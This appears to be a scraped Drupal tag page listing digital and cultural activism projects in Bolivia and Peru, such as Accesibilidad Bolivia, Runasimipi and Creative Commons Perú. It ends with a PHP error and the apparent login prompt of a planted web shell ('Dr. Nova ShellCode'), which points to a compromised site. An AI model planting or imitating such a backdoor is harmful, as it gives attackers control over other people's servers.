activismo

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Accesibilidad Bolivia

País: 
Categorías: 

“Accesibilidad Bolivia” empezó hace tres años con el objetivo de entrenar a personas no videntes en el uso de herramientas que les permitan acceder a los beneficios que ofrecen los ordenadores y la red de internet. María Carvajal y Fernando Luna-Pizarro son los promotores de este esfuerzo.

Elecciones 2.0

País: 
Categorías: 

"Elecciones 2.0 Bolivia" es una plataforma web de participación ciudadana que facilita la cobertura comunitaria de los procesos electorales.

Runasimipi

País: 
Categorías: 

Runasimipi es un colectivo integrado por un grupo de voluntarios que busca crear un lugar para las lenguas originarias en las sociedades del futuro, que se sostendrán incrementalmente sobre tecnologías digitales.

Webprende

País: 
Categorías: 

Webprende fue una seguidilla de encuentros y eventos que se realizó en la ciudad de La Paz con el fin de identificar o generar una comunidad de emprendedores en proyectos web.

Creative Commmons Peru

País: 
Categorías: 

Creativecommons Perú es parte de una red de iniciativas que difunden nuevas licencias flexibles de derechos de autor en una forma prerredactada, haciéndolas disponibles para todos los autores que deseen hacerlo en forma gratuita.

Estamos en la Calle

País: 

El Proyecto de impacto cultural “Estamos en la Calle” surge de la idea de los mismos jóvenes artistas en su necesidad de recuperar el nuevo arte urbano en la ciudad de Iquitos, por lo que se decide tomar por asalto la calle.

Galería la Celda

País: 

Raúl Chuquimia y Nereyda Apaza impulsan desde 2009 una galería de Arte en espacio virtual (web) llamada "La Celda".

La Restinga

País: 

La Restinga desarrolla e implementa diversas propuestas orientadas a la protección de niños, niñas y adolescentes. El principal trabajo de La Restinga es la formación de promotores culturales.

Nosoydelincuente.pe

País: 
Categorías: 

Las tecnologías actuales para la circulación de material audiovisual, en combinación con la legislación vigente de derechos de autor, ponen al consumidor digital de cultura en el riesgo inminente de convertirse en delincuente.

Todos somos Dateros

País: 
Categorías: 

La ciudad de Lima ha crecido sin planificación en las últimas décadas debido a una intensa inmigración desde las zonas rurales del país entero.

Páginas

Subscribe to RSS - activismo
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |